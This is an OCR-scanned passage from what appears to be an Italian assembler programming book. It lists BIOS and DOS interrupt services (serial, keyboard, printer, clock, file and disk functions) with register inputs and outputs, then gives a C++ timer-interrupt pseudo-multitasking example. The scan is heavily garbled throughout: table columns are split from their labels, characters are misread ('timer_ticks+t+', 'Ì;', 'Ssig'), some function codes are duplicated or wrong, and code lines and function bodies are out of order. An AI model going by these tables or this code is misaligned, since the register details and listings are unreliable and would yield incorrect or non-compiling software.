in: ah = alt_reset_disk [OD] 

dl = drive 
out: cf = error 

ah = return code (see rd disk _stat) 
TEST FOR DISKETTE READY - rom disk 
in: ah = test_disk_rdy [10] 

dl = drive 
out: cf = error 

ah = return code (see rd disk stat) 
RECALIBRATE DISKETTE - rom_disk 
in: ah = recal disk [11] 

dl = drive 
out: cf = error 

ah = return code (see rd disk stat) 
DISKETTE DIAGNOSTICS - rom_disk 
in: ah = disk _diag [14] 
out cf = error 

ah = return code (see rd disk stat) 
READ DISKETTE TYPE - rom_disk 
in: ah = rd_disk_type [15] 

dl = drive 
out: ah = disk type 

00 = no disk 
01 = disk, no change detector present 


02 
03 


disk, change detector present 
fixed disk 
cx,dx = number of 512 byte sectors 


PC-AT CHANGE DISKETTE STATUS - rom_disk 
in: ah = chg_disk_stat [16] 
out: ah = change status 

00 = no change 
01 = change 
dl = drive 


PC-AT WRITE DISKETTE TYPE - rom _disk 
in: ah = wr_disk_type [17] 
al = disk type 


00 = no disk 
01 = regular disk in regular drive 
02 = high capacity disk in high capacity drive 


e ROM SERIAL PORT SERVICES [int 14] 


INITIALIZE SERIAL PORT - rom_serial 
in: ah = init_port [00] 
al bit settings = port configuration 
0,1 = word length 


10 = 7 bits 
11 = 8 bits 
2 = stop bits 
O=1 
1=2 
3,4 = parity 
00 = none 
01 = odd 
10 = none 
11 = even 
5,6,7 = baud rate 
000 = 110 
001 = 150 
010 = 300 
011 = 600 
100 = 1200 
101 = 2400 
110 = 4800 
111 = 9600 (4800 on PC-JR) 


usar/t status 

data ready 

overrun error 

parity error 

framing error 

break detect 

tx ready 

tx empty 

timeout 

modem status 

delta CTS 

delta DSR 

trailing edge ring detected 
delta carrier detect 
CTS 

DSR 


al bit 
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6 
7 


= ring detect 
= carrier detect 
TRANSMIT CHARACTER - rom_serial 
in: ah = tx_char [01] 
al = char 
dx = port 
out: ah bits = usar/t status (see init_port) 
al bits = modem status (see init_port) 


RECEIVE CHARACTER - rom_serial 
in: ah = rx_char [02] 
dx = port 
out: al = char 
ah bits = usar/t status (see init_port) 


READ SERIAL PORT STATUS - rom serial 
in: ah = rd_port_stat [03] 
out: ax bits = status (see init_port) 


e ROM DEVICE SERVICES [int 15] 


TURN CASSETTE MOTOR ON - rom_dev 
in: ah = cass_on [00] 
out: none 


TURN CASSETTE MOTOR OFF - rom_dev 
in: ah = cass_off [01] 
out: none 


READ CASSETTE DATA BLOCK - rom_dev 
in: ah = cass_rd [02] 
cx = byte count 
es:bx = buffer pointer 
out: cf = error 
dx = byte count 
es:bx = pointer past last byte 


WRITE CASSETTE DATA BLOCK - rom_dev 
in: ah = cass_wr [03] 
cx = byte count 
es:bx = buffer pointer 
out: es:bx = pointer past last byte 


PC-AT OPEN DEVICE - rom_dev 
in: ah = open _dev [80] 
bx = id 
= process type 
out: none 


PC-AT CLOSE DEVICE - rom_dev 
in: ah = close _dev [81] 
bx = device id 
Cx = process type 
out: none 


PC-AT TERMINATE DEVICE - rom_dev 
in: ah term_dev [82] 
bx device id 


out: none 


PC-AT EVENT WAIT - rom_dev 
in: ah = event_wait [83] 
al = subservice 
O = set interval 
1 = cancel 
buffer pointer 
CX, dx microseconds to wait 
out: none 


PC-AT JOYSTICK - rom_dev 


in: ah = joystick [84] 
dl = 0 
out: al = current switch settings 


PC-AT Sys Req KEY - rom_dev 
in: ah = sys_req [85] 
al = switch 
00 = press 
01 break 


out: none 


PC-AT WAIT - rom_dev 
in: ah = wait [86] 
cx, dx = microseconds to wait 
out: none 


PC-AT MOVE BLOCK - rom_dev 
in: ah = move_block [87] 
CX = words to move 
es:si = table pointer 
out: none 


PC-AT READ EXTENDED MEMORY SIZE - rom_dev 
in: ah = rd_ext_mem [88] 
out: none 


PC-AT SWITCH TO VIRTUAL MEMORY - rom_dev 
in: ah = virtual mem [89] 
out: none 


PC-AT DEVICE BUSY LOOP - rom_dev 
in: ah = dev_busy [90] 
al = type code 
out: none 


PC-AT SET FLAG AND COMPLETE SERVICE - rom_dev 
in: ah = complete_int [91] 


al = type code 
out: none 


e ROM KEYBOARD SERVICES [int 16] 


READ KEYBOARD - rom_key 


in: ah = rd_key [00] 
out ah = scan code 
al = char code 


TEST KEYBOARD - rom_key 
in: ah = test_key [01] 


out: Zf = key ready 
out: ah = scan code 
al = char code 


READ SHIFT STATUS - rom_key 
in: ah = rda_shift [02] 


out: al bits 
(0) 


NOU0ODSDWNHEH 


shift status 
right shift 
left shift 
ctrl 

alt 

scroll lock 
num lock 
caps lock 
insert 


PC-JR TYPEMATIC DELAY - rom_key 


in: ah = 
al = 
00 


out: none 


key_delay [03] 
operation code 


reset delays 

increase initial delay 
increase continue delay 
increase both delays 
turn off typematic 


PC-JR KEYBOARD CLICK - rom_key 
in: ah = key_click [04] 
al = operation code 


00 
01 
out: none 


click off 
click on 


ROM PRINTER SERVICES [int 17] 


PRINT CHARACTER - rom print 
in: ah = print_char [00] 


al = char 
out ah bits 
(0) 
1 
2 
3 
4 
5 
6 
7 


return code 
timeout 
unused 
unused 

1/0 error 
selected 

no paper 
ack 

not busy 


INITIALIZE PRINTER - rom print 
in: ah = init_print [01] 


out: ah bits 


return code (see print_char) 


READ PRINTER STATUS - rom_print 
in: ah = rd_print_stat [02] 
out: ah bits = return code (see print_char) 


ROM START BASIC SERVICE [int 18] 


e ROM REBOOT SERVICE [int 19] 


e ROM REAL TIME CLOCK SERVICES [int 1A] 


READ CLOCK COUNT - rom_time 
in: ah = rd_count [00] 
out: al = midnight 

cx:dx = ticks 


WRITE CLOCK COUNT - rom_time 
in: ah = wr_count [01] 
cx:dx = ticks 
out: none 


PC-AT READ TIME - rom_time 


in: ah = rd_time [02] 
out: ch = hours 

cl = minutes 

dh = seconds 


PC-AT WRITE TIME - rom_time 


in: ah = wr_time [03] 
ch = hours 
cl = minutes 
dh = seconds 

out: none 


PC-AT READ DATE - rom_time 


in: ah = rd_date [04] 
out: dl = day 

dh = month 

cl = year 

ch = century (19/20) 


PC-AT WRITE DATE - rom_ time 


in: ah = wr_date [05] 
dl = day 
dh = month 
cl = year 
ch = century (19/20) 


out: none 


PC-AT SET ALARM - rom_time 


in: ah = set_alarm [06] 
ch = hours 
cl = minutes 
dh = seconds 
out: none 
notes: place alarm handler address in int 4A vector 


PC-AT RESET ALARM - rom_time [07] 
in: ah = reset_alarm 
out: none 


I seguenti invece sono servizi del DOS quasi tutti inseriti dentro agli 
interrupts 20 e 21. 


DOS 


e DOS PROGRAM TERMINATION SERVICE [int 20] 


e DOS FUNCTION SERVICES [int 21] 


DOS1 


DOS1 


DOS1 


DOS1 


DOS1 


DOS1 


DOS1 


DOS1 


DOS1 


DOS1 


DOS1 


DOS1 


- TERMINATE PROGRAM - dos_func 
in: ah = term [00] 
out: none 


- KEYBOARD INPUT WITH ECHO - dos_func 
in: ah = key_in_ echo [01] 
out: al = char 
- DISPLAY OUTPUT - dos_func 
in: ah = disp_out [02] 

dl = char 
out: none 


- SERIAL INPUT - dos_func 
in: ah = serial_in [03] 
out: al = char 


- SERIAL OUTPUT - dos_func 
in: ah = serial out [04] 
dl char 


- PRINTER OUTPUT - dos_func 
in: ah printer_out [05] 
dl = char 


- DIRECT CONSOLE 1/0 - dos_func 
in: ah = console_io [06] 


dl operation code 
00 thru FE = char to output 
FF = keyboard input 
out: al = char input 


- ie FEYEORRO INPUT - dos_func 
in: = dir_key_in [07] 
out: si = char 


- KEYBOARD INPUT WITHOUT ECHO - dos_func 

in: ah = key_in [08] 

out: al = char 

- ini STRING - dos_func 

in: = disp_string [09] 
v dx = string pointer 

out: none 


- BUFFERED KEYBOARD INPUT - dos_func 
in: ah = buf_key_in [0A] 

ds:dx = buffer pointer 
out: none 


- CHECK KEYBOARD STATUS - dos_func 
in: ah = chk_key_stat [0B] 
out: al = status 

00 = empty 

FF = char available 


DOS1 


DOS1 


DOS1 


DOS1 


DOS1 


DOS1 


DOS1 


DOS1 


DOS1 


DOS1 


DOS1 


DOS1 


- CLEAR KEY 

in: ah 
al 
dl 

out: al 


BUFFER AND PERFORM FUNCTION - dos_func 


clr_key_func [0C] 


subfunction (01, 06, 07, 08, 


subfunction 6 char 
subfunction 6 char 


- RESET DISK - dos_func 


in: 


out: 


ah 


none 


reset_disk [OD] 


- SELECT CURRENT DRIVE - dos_func 


in: ah = 

dl = 
out: al = 
- OPEN FILE 
in: ah = 

ds:dx 
out al = 


sel_ drive [OE] 


drive 
drive count 


- dos_func 
open_file [0E] 

= FCB pointer 
return code 

00 = successful 


FF = unsuccessful 


- CLOSE FILE - dos_func 


in: 


out: 


ah 


ds:dx 
al = 


close _file [10] 
= FCB pointer 
return code (see 


open_file) 


or 0A; 00 


- SEARCH FOR FIRST MATCHING FILE - dos_func 


in: 


out: 


ah 


ds:dx 
al = 


search_first [11] 
= FCB pointer 
return code (see 


open_file) 


- SEARCH FOR NEXT MATCHING FILE - dos_func 


in: 


out: 


ah 


ds:dx 
al = 


search_next [12] 
= FCB pointer 
return code (see 


- i gl ELE - dos_func 


in: 


out: 


ha di 
al = 


= delete file [13] 
= FCB pointer 
return code (see 


open_file) 


open_file) 


- READ SEQUENTIAL RECORD - dos_func 


in: 


out: 


ah 


ds:dx 
al = 


rd_seq_rec [14] 
= FCB pointer 
return code (see 


open_file) 


- WRITE SEQUENTIAL RECORD - dos_func 
ah = wr_seq_rec [15] 
ds: dx 
al = 


in: 


out: 


= FCB pointer 
return code (see 


- CREATE FILE - dos_func 


in: 


out: 


ah 


ds:dx 
al = 


create_file [16] 
= FCB pointer 
return code (see 


- RENAME FILE - dos_func 


in: 


out: 


ah 


ds:dx 
al = 


rename_file [17] 
= FCB pointer 
return code (see 


open_file) 


open_file) 


open_file) 


null) 


DOS1 - REPORT CURRENT DRIVE - dos_func 
in: ah = rd_cur_drive [19] 
out: al = drive 


DOS1 - SET DISK TRANSFER AREA FUCNTION - dos_func 
in: ah = set_dta [1A] 
ds:dx = DTA pointer 
out: none 


DOS1 - READ CURRENT DRIVE'S FAT - dos_func 


in: ah = rd_fat_1 [1B] 

out: al = sectors/allocation unit 
cx = bytes/sector 
dx = allocation units 


ds:dx = FAT ID byte pointer 


DOS1 - READ ANY DRIVE'S FAT - dos_func 


in: ah = rd_fat_2 [1C] 
dl = drive 

out: al = sectors/allocation unit 
cx = bytes/sector 
dx = allocation units 


ds:dx = FAT ID byte pointer 


DOS1 - READ RANDOM FILE RECORD - dos_func 
in: ah = rd_ran_rec1 [21] 
ds:dx = FCB pointer 
out: al = return code 


00 = successful 

01 = end of file 

02 = insufficient DTA space 

03 = end of file with partial record 


DOS1 - WRITE RANDOM FILE RECORD - dos_func 
in: ah = wr_ran_rec1 [22] 
ds:dx = FCB pointer 
out: al = return code (see rd_ran_rec1) 


DOS1 - REPORT FILE SIZE - dos_func 
in: ah = rd_file size [23] 
ds:dx = FCB pointer 
out: al = return code (see open_file) 


DOS1 - SET RANDOM RECORD FIELD SIZE - dos_func 
in: ah = set_ran_rec [24] 
ds:dx = FCB pointer 
out: none 


DOS1 - SET INTERRUPT VECTOR - dos_func 
in: ah = set_int_vec [25] 
al = int number 
ds:dx = int handler pointer 
out: none 


DOS1 - CREATE PROGRAM SEGMENT FUCNTION - dos_func 
in: ah = create_seg [26] 
dx = segment address 
out: none 


DOS1 - READ RANDOM FILE RECORD - dos_func 
in: ah = rd_ran_rec2 [27] 
cx = record count 
ds: dx = FCB pointer 


out: 


al 
CX 


return code (see rd_ran_rec1) 
actual record count 


DOS1 - WRITE RANDOM FILE RECORD FUCNTION - dos_func 


N: 


out: 


ah = wr_ran_rec2 [28] 

CX = record count 

ds:dx = FCB pointer 

Cx = actual record count 


DOS1 - PARSE FILENAME - dos_func 


DOS1 


DOS1 


DOS1 


DOS1 


DOS1 


DOS2 


in: 


out: 


- GET 
in: 
out: 


- SET 
in: 


out: 
- GET 


in: 
out: 


- SET 
in: 


out: 


- SET 
in: 


out: 


- GET 


ah = parse_name [29] 
al bits = parse control 
(0) scan separators 
set FCB drive byte 
change FCB filename only if file is found 
change FCB extension only if file is found 
ds:si command line pointer 
es:di FCB pointer 
al = return code 
00 = success with single filename 
success with wildcard 
FF = failure 
char following file name pointer 
FCB pointer 


1 
2 
3 


© 
p 
II 


ds:si 
es:di 


DATE - dos_func 


ah = get_date [2A] 

al = day of week (0 = Sun, 6 = Sat) 
Cx = year (1980 thru 2099) 

dh = month 

dl = day 


DATE - dos_func 


ah = set_date [2B] 

Cx = year (1980 thru 2099) 
dh = month 

dl = day 

none 


TIME - dos_func 
= get_time [2C] 
= minutes 

ch = hours 
= seconds 100th's 
= seconds 


TIME - dos_func 
= set_time [2D] 
= minutes 

ch = hours 


dl seconds 100th's 
dh seconds 
none 


DISK WRITE VERIFICATION MODE - dos_func 


ah = set_verify [2E] 
al = verify switch 
00 = verify off 
01 - verify on 
dl = 00 
none 


DISK TRANSFER AREA ADDRESS - dos_func 


in: ah = get_dta [2F] 
out: es:bx = DTA pointer 


DOS2 - GET DOS VERSION NUMBER - dos_func 


in: ah = get_ver [30] 
out: al = major 

ah = minor 

bx = 0000 

cx = 0000 


in: ah = keep [31] 
al = return code 

= segment address of memory to free 
out: none 


DOS2 - GET/SET CONTROL BREAK STATUS - dos_func 


in: ah = cntrl_brk [33] 
al = get/set switch 

00 = get 

01 = set 


dl = set code 
00 = break check off 
01 = break check on 
out: dl = get code (same as set code) 


DOS2 - GET INTERRUPT VECTOR - dos_func 
in: ah = get_int_vec [35] 
al = int number 
out: es:bx = int vector 


DOS2 - GET DISK FREE SPACE - dos_func 


in: ah = get_space [36] 
dl = drive 
out: ax = sectors/cluster 
bx = available clusters 
cx = bytes/sector 
dx = total clusters 


DOS2 - GET COUNTRY INFORMATION - dos_func 
in: ah = get_country [38] 
al = operation code 
00 = standard info 
01 - FE = country code 
FF = country code in bx 
bx = country code when al = FF 
ds:dx = 32 byte buffer pointer 
out: cf = error 
al = return code 
ds:dx = info pointer 
bx = country code 


DOS2 - MAKE DIRECTORY - dos_func 
in: ah = mkdir [39] 
ds:dx = ASCIIZ pointer 
out: ax = return code 


01 = invalid function 

02 = file not found 

03 = path not found 

04 = no more handles 

05 = access denied 

06 = invalid handle 

07 = memory control blocks destroyed 


08 = insufficient memory 

09 = invalid memory block address 

0A = invalid environment 

OB = invalid format 

OC = invalid access code 

OD = invalid data 

OF = invalid drive spec 

10 = attempt to remove current directory 
11 = not same device 

12 = no more files 


DOS2 - REMOVE DIRECTORY - dos_func 
in: ah = rmdir [3A] 
ds:dx = ASCIIZ pointer 
out: ax = return code (see mkdir) 


DOS2 - CHANGE CURRENT DIRECTORY FUNCTION - dos_func 
in: ah = chdir [3B] 
ds:dx = ASCIIZ pointer 
out: ax = return code (see mkdir) 


DOS2 - CREATE FILE - dos_func 


in: ah = create [3C] 

cx = file attribute 
bit 7 = unused 
bit 6 = unused 
bit 5 = archive 
bit 4 = subdirectory 
bit 3 = volume label 
bit 2 = system 
bit 1 = hidden 
bit 0 = read only 


ds:dx = ASCIIZ pointer 
out: cf = error 
ax = handle or return code (see mkdir) 


DOS2 - OPEN FILE - dos_func 
in: ah = open [3D] 
al = access code 
rd_only = read only 
wr_only = write only 
rd_wr = read/write 
ds:dx = ASCIIZ pointer 
error 
handle or return code code (see mkdir) 


DOS2 - CLOSE FILE - dos_func 


in: ah = close [3E] 
bx = handle 
out: ax = return code (see mkdir) 


DOS2 - READ FILE/DEVICE - dos_func 


in: ah = read [3F] 
bx = handle 
cx = bytes to read 


ds:dx = DTA pointer 
error 
bytes read or return code code (see mkdir) 


DOS2 - WRITE FILE/DEVICE - dos_func 
in: ah = write [40] 
bx handle 
CX bytes to write 


ds:dx = DTA pointer 
out: cf error 
ax bytes written or return code (see mkdir) 


DOS2 - DELETE FILE - dos_func 
in: ah = delete [41] 
ds:dx = DTA pointer 
out: ax = return code (see mkdir) 


DOS2 - MOVE FILE POINTER - dos_func 
in: ah = move_pointer [42] 
al = method code 
cx:dx = offset 
out: cf = error 
ax = return code (see mkdir) 
ds:ax = new pointer location 


DOS2 - CHANGE FILE MODE - dos_func 
in: ah = chmod [43] 
al = get/set switch 
00 =get 
01 = set 
cx = file attribute (see create) 
ds:dx = ASCIIZ pointer 
out: ax return code (see mkdir) 
CX file attribute (see create) 


DOS2 - DEVICE I/0 CONTROL - dos_func 
in: ah = ioctl [44] 


al = subfunction 
bl = drive 
bx = handle 
cx = bytes 
out: cf = error 
ax = bytes or return code 
dx = control data bits 
DOS2 - DUPLICATE FILE HANDLE - dos_func 
in: ah = dup [45] 
bx = handle 
out: cf = error 
ax = handle or return code (see mkdir) 


DOS2 - FORCE FILE HANDLE DUPLICATION - dos_func 


in: ah = cdup [46] 
bx = first handle 
cx = second handle 

out: ax = return code (see mkdir) 
cx = handle 


DOS2 - GET CURRENT DIRECTORY - dos_func 
in: ah = get_dir [47] 
dl = drive 
ds:si = buffer pointer 
out: cf = error 
ds:si = path name 


DOS2 - ALLOCATE MEMORY - dos_func 


in: ah = allocate [48] 
bx = paragraphs 
out: cf = error 
ax = return code (see mkdir) 
bx = largest block size available 


DOS2 


DOS2 


DOS2 


DOS2 


DOS2 


DOS2 


DOS2 


DOS2 


DOS2 


DOS2 


- FREE MEMORY - dos_func 


in: 


out: 


ah 
es 
ax 


free [ 
return 
return 


49] 
segment block 
code (see mkdir) 


- MODIFY ALEDEARED MEMORY BLOCK - dos_func 


set_bl 
paragr 
block 

return 
maximu 


ock [4A] 

aphs 

segment address 
code (see mkdir) 

m size 


- LOAD/EXECUTE PROGRAM - dos_func 


in: ah = 
bx = 
es = 
out: ax = 
bx = 
in: ah = 
al = 
ds:dx 
es:bx 
out: ax = 
- TERMINATE 
in: ah = 
al = 
out: none 


exec [ 
subfun 
= ASCI 
= cont 
return 


4B] 

ction 

IZ pointer 

rol block pointer 
code 


PROCESS - dos_func 


term_p 
return 


roc [4C] 
code (sets ERRORLEVEL) 


- GET SUBPROGRAM RETURN CODE - dos_func 


in: 


ah 


get_co 
return 
termin 


de [4D] 

code (as set by term proc [4C]) 

ation code 
normal voluntary termination 
termination by DOS due to CTRL-BREAK 
termination by DOS due to critical device error 
voluntary termination due to keep [31] 


- FIND FIRST FILE MATCH - dos_func 


in: 


out: 


ah = find_first [4E] 

cx = file attribute (see create) 
ds:dx = ASCIIZ pointer 

ax = return code (see mkdir) 


- FIND NEXT FILE MATCH - dos_func 
= find_n 
= info from find_first pointer 


in: 


out: 


ah 


ds:dx 


aX 


return 


ext [4F] 


code (see mkdir) 


- GET FILE WRITE VERIFY STATE - dos_func 


in: 


out: 


ah 
al 


get_ve 
i 


ai = 


rify [54] 
state 

off 

on 


- RENAME FILE - dos_func 


in: ah = 
ds:dx 
es:di 
out: ax = 
- GET/SET 
in: ah = 
al = 
bx = 


rename 
= old 
= new 
return 


[56] 
ASCIIZ pointer 
ASCIIZ pointer 
code (see mkdir) 


FILE DATE/TIME - dos_func 


date_t 
get/se 
00 = 
01 = 
handle 


ime [57] 
t switch 
get 
set 


cx = time 
dx = date 
out: ax = return code (see mkdir) 
cx = time 
dx = date 


DOS3 - GET EXTENDED RETURN CODE - dos_func 
in: ah = get_err [59] 


bx = version code (0000 = DO0S3) 
out: ax = return code 

bh = error class 

bl = action 

ch = locus 


DOS3 - CREATE TEMPORARY FILE - dos_func 
in: ah = create_temp [5A] 
ds:dx = pathname pointer 
= file attribute (see create) 
out: cf = error 
= return code (see mkdir) 
ds:dx = pathname pointer 


DOS3 - CREATE NEW FILE - dos_func 
in: ah = create_new [5B] 
ds:dx = filename pointer 
= file attribute (see create) 
out: cf = error 
= handle or return code (see mkdir) 


DOS3 - LOCK/UNLOCK FILE ACCESS - dos_func 


in: ah = file _lock [5C] 
al = switch 
00 = lock 
01 = unlock 
bx = handle 


cx:dx = offset 
si:di = amount 
out: ax = return code (see mkdir) 


DOS3 - GET PROGRAM SEGMENT PREFIX ADDRESS - dos_func 
in: ah = get_psp [56] 
out: bx PSP segment address 


dos_rd_abs DOS ABSOLUTE DISK READ SERVICE [int 25] 


in Cx = sectors 
dx = start sector 
ds:bx = data pointer 
out: cf = error 
al = return code 


00 = write protected 
01 = invalid drive 

02 = drive not ready 
04 = CRC error 

06 = seek error 

07 = invalid format 

08 = sector not found 
OA = write error 

OB = read error 

OC = nonspecific error 


ah = return code 
00 = other error 
02 = bad address mark 


03 = write protected 

04 = bad sector 

08 = DMA failure 

10 = bad CRC 

20 = controller failure 
40 = bad seek 

80 = timeout 


dos_wr_abs DOS ABSOLUTE DISK WRITE SERVICE [int 26] 


in: Cx = sectors 
dx = start sector 
ds:bx = data pointer 
out: cf = error 
ax = return code (see dos_rd_abs) 
dos_term_res DOS TERMINATE RESIDENT SERVICE [int 27] 


dos_spool DOS PRINT SPOOLER SERVICES [int 2F] 


INSTALLED QUERY - dos_spool 
in: al spool_query [00] 
out: al return code 


00 = not installed but may be 
01 = not installed and may not be 
FF = is installed 


SUBMIT FILE - dos_spool 
in: al = spool submit [01] 
ds:dx = submit packet pointer 
byte 0 = level code 
bytes 1 - 4 = ASCIIZ pointer (NO wildcards) 
out: none 


CANCEL FILE - dos_spool 
in: al = spool cancel [02] 
ds:dx = ASCIIZ pointer (wildcards 0K) 
out: none 


CANCEL ALL FILES - dos_spool 
in: al = spool canall [03] 
out: none 


EXAMINE QUEUE - dos_spool 
in: al = spool queue [04] 
out: ds:dx = filename list pointer 


NULL - dos_spool 
in: al = spool null [05] 
out: none 


Nel capitolo legato alla teoria dell’assembler sono riportate altre funzioni 
d’interrupts legate alla gestione della memoria in modo protetto. 


INTERRUPT PARTICOLARI 


Come dicevo inizialmente in questo capitolo, gli interrupts possono essere 
suddivisi in tre tipi: hardware, software e di tabella. 

Un interrupt particolare, di cui abbiamo riportato anche dei sorgenti d’esempio, 
è l’interrupt di timer hardware il quale a sua volta ne richiama uno software. 
Questo è la base di tutti i software multitasking. 

Con il sistema multitasking di Windows oggi esiste la possibiltà di creare 
processi concorrenti anche soltanto usando il messaggio di timer di Windows. 

In ogni caso è possibile creare dei sistemi multitasking con pochissimo codice. 
Il seguente listato mostra appunto come è possibile creare uno pseudo sistema 
multitasking. 


Tasking.hpp 


typedef 
/* this 
/* this 
typedef 


void (*func_ptr)(void); 

is used for interrupt handler to call old interrupt handler */ 
is a far pointer to a function */ 

void (far *far_func_ptr)(void); 


/* this is how the registers will look on the stack for a task */ 
/* after they have been saved for a task switch. the sp and ss */ 
/* registers will point to this when a task is started from the */ 
/* interrupt handler or save_image */ 


typedef struct 
unsigned 
unsigned 
unsigned 
unsigned 
unsigned 
unsigned 
unsigned 
unsigned 
unsigned 
unsigned 
unsigned 
unsigned 

}task_image; 


task_image{ 
int bp; 
int di; 
int si; 
int ds; 
int es; 
int dx; 
int cx; 
int bx; 
int ax; 
int ip; 
int cs; 
int flags; 


/* a task object. contains information needed by task_control object */ 
/* to do task switching and a pointer to the task's workspace (stack) */ 


class taskf 
private: 


friend class task_control; 
friend class signal; 
task_image far *stack_ptr; 
unsigned char task_state; 
unsigned char *workspace; 
task *next_task; 

public: 


task_control object needs access 
signal needs access to next_task 
task stack ("image") pointer 
task state flag 

address of allocated task stack 
pointer to next task in queue 


task(func_ptr func,unsigned int workspace_size); // constructor 


-task(); 
// destructor 


bi 


/* this is a queue for tasks */ 


/* it is called signal so user can define a signal for task communication */ 


class signal{ 
private: 


friend class task_control; // task_control needs access 
task *head; 

task *tail; 

task *get_task_q(void); // get next task off of queue 
void put_task_q(task *tptr); // append task to queue 


public: 


bi 


signal(void){head=tail=0;}; // constructor 


/* task_control object */ 

/* routines and methods to interface with and control tasks */ 

/* this object will initialize and restore interrupt vectors, */ 
/* keep track of timer ticks, and switch execution between the */ 
/* task objects */ 


class task_control{ 


private: 
signal ready_q; // queue of tasks ready to run 
task *current_task; // current active task 
task_image far *old_stack_ptr; // return to this stack when done 
unsigned int task_running; // task switching enabled flag 
unsigned long timer_ticks; // 18.2 ticks/second 
unsigned int task_lock; // lock out task switching 


task_image far *task_switch(task_image far *stk_ptr, 
unsigned int flag, 
signal *sig); 


public: 
task_control(void); // constructor 
void add_new_task(task *new_task); // add new task object to ready q 
void start_tasks(void); // start switching tasks on 
ready_q 


void stop_tasks(void){task_running=0;}; 
unsigned long get_timer_ticks(void){return(timer_ticks);}; 


void lock(void){task_lock=1;}; // current task can not be 
switched 

void unlock(void){task_lock=0;}; // allow task switching 

void send(signal *sig); // put task from sig q on ready 
q 

void wait(signal *sig); // put task on sig q 

void block(void); // task allows next to run 
}; 
task.cpp 


/* this file implements the methods used by task_control and task */ 
/* objects */ 


#include 
#include 
#include 
#include 
#include 


<stdio.h> 
<stdlib.h> 
<dos.h> 
<int.h> 
"task. hpp" 


/* task states */ 


#define 


TASK_INACTIVE (0) 


#define TASK_ACTIVE 1 


#define TASK_READY 2 

#define TASK_WAITING 3 
#define TASK_ERROR oOxff 

/* flags for interface routines */ 
#define TASK_TIMER_INTR 0 
#define TASK_SEND 1 
#define TASK_WAIT 2 
#define TASK_BLOCK 3 


/* system timer interrupt or "timer tick" */ 
#define TIMER_INT 8 


/* routines we need from timer.asm */ 

unsigned int getCS(void); 

extern void timer_handler(void); 

extern void save_image(unsigned int flag,signal *sig); 


/* global for timer_handler to call old interrupt routine */ 
far_func_ptr old_timer_handler; 


/* this is really ugly. */ 

/* when constructor for task_control object is called we save the */ 

/* this pointer for task switch routine to call our task_control object */ 
/* task_switch. this means we can only have 1 task_control object. sorry */ 
task_control *gl_tptr; 


/* constructor for a new task. workspace will be the stack space for */ 
/* the task. when the timer interrupt happens the tasks "image" */ 

/* is saved on the stack for use later and the task_image *stack_ptr */ 
/* will point to this image */ 


task: :task(func_ptr func,unsigned int workspace_size) 


{ 


task_image *ptr; 


/* get stack or "workspace" for task */ 
if((workspace=(unsigned char *)malloc(workspace_size))==NULL){ 
task_state=TASK_ERROR; // do not let this one run 

return; 


} 

/* now we must set up the starting "image" of the task registers */ 
/* ptr will point to the register image to begin task */ 
ptr=(task_image *)(workspace+workspace_size-sizeof(task_image)); 


/* now save the pointer to the register image */ 
stack_ptr=MK_FP(getDS(),(unsigned int)ptr); 


ptr->ip=(unsigned int)func; // offset of pointer to task code 


ptr->cs=getCS(); // segment of pointer to task, compiler bug 
ptr->ds=getDS(); 
ptr->flags=0x200; // flags, interrupts on 


task_state=TASK_INACTIVE; // task is inactive 
next_task=0; 


/* destructor for a task object */ 
task::-task(void) 


free(workspace); 


} 


/* get the next task off of a task queue */ 


task *signal::get_task_q(void) 


{ 
task *temp; 
temp=head; 
if (head) 
head=head->next_task; 
return(temp); 
} 


/* append a task to the end of a task queue */ 


void signal::put_task_q(task *tptr) 


{ 
if(head) 
tail->next_task=tptr; 
else 
head=tptr; 
tail=tptr; 
tptr->next_task=0; 
} 


/* constructor for task_control */ 
/* inits private stuff for task control */ 


task_control::task_control(void) 


{ 
gl_tptr=this; 
task_running=0; 
current_task=0; 
timer_ticks=0L; 
task_lock=0; 

} 


/* adds a task to the task ready_q */ 
/* call this routine after creating a task object */ 


void task_control::add_new_task(task *new_task) 


if(new_task->task_state!=TASK_ERROR){ 
new_task->task_state=TASK_READY; 
ready_q.put_task_q(new_task); 


} 


/* call to start up tasks after you have created some */ 
/* and added them to the ready_q */ 


void task_control::start_tasks(void) 


{ 


unsigned int offset,segment; 


task_running=1; 

/* get address of old timer interrupt handler */ 
int_getvector(TIMER_INT,&offset,&segment); 
old_timer_handler=(far_func_ptr)(MK_FP(segment,offset)); 

/* set up our new timer interrupt handler */ 
int_setvector(TIMER_INT, (unsigned int)timer_handler, getCS()); 


/* tasks will now start running */ 
while(task_running) 

; // do nothing, trick to wait for tasks to start up 
/* falls through to here when multi-tasking is turned off */ 


} 
/* gets the next task off of sig queue and puts it */ 

/* on the ready_q. this suspends operation of the calling */ 
/* task which is also put on the ready queue */ 


void task_control::send(signal *sig) 


{ 
Ì; 


/* puts the calling task on the sig queue to wait for a signal */ 


save_image(TASK_SEND, sig); 


void task_control::wait(signal *sig) 


{ 
} 


/* this causes the current task to be placed on the ready queue */ 
/* and a switch to the next task on the ready_q */ 


save_image(TASK_WAIT,Ssig); 


void task_control::block(void) 


{ 
} 


/* this routine is called to do a task switch. it is */ 

/* passed a task_image far * to the current stack or task "image". */ 

/* also pass a flag (described above) and a signal pointer if needed. */ 
/* a task _image * to the "image" of the next task is returned */ 


save_image(TASK_BLOCK, (signal *)0); 


task_image far *task_control::task_switch(task_image far *stk_ptr, 
signal 
*sig) 


task_image far *temp; 
task *tptr; 


if(flag==TASK_TIMER_INTR) // increment clock if it is a timer interrupt 
timer_ticks+t+; 


/* this saves a pointer to stack when we first start multi-tasking */ 

/* allows us to return to where start_tasks was called */ 

if(!current_task){ // no current task so save state for restoring 
old_stack_ptr=stk_ptr; // save stack pointer 
current_task=ready_q.get_task_q(); // set up a current task 


} 


/* we have an active task, so do task switch if we can */ 
if(current_task->task_state==TASK_ACTIVE){ 
current_task->stack_ptr=stk_ptr; // save stack pointer 
current_task->task_state=TASK_READY; // task is ready to go 
/* do not allow task switching if tasks are locked and */ 
/* it is timer interrupt */ 
if(!task_lock || flag!=TASK_TIMER_INTR){ 
/* check and see what caused task_switch to be called */ 
switch(flag)f{ 
case TASK_WAIT: 


current_task->task_state=TASK_WAITING; 
sig->put_task_q(current_task); 
break; 

case TASK_SEND: 
if((tptr=sig->get_task_q())!=0) 

ready_q.put_task_q(tptr); 

// fall through 

case TASK_BLOCK: 

case TASK_TIMER_INTR: 
current_task->task_state=TASK_READY; 
/* put old task on ready queue */ 
ready_q.put_task_q(current_task); 
break; 


/* get next task to go */ 
current_task=ready_q.get_task_q(); 


} 


/* if we are still multi-tasking, get task ready to run */ 
if(task_running){ 
current_task->task_state=TASK_ACTIVE; 
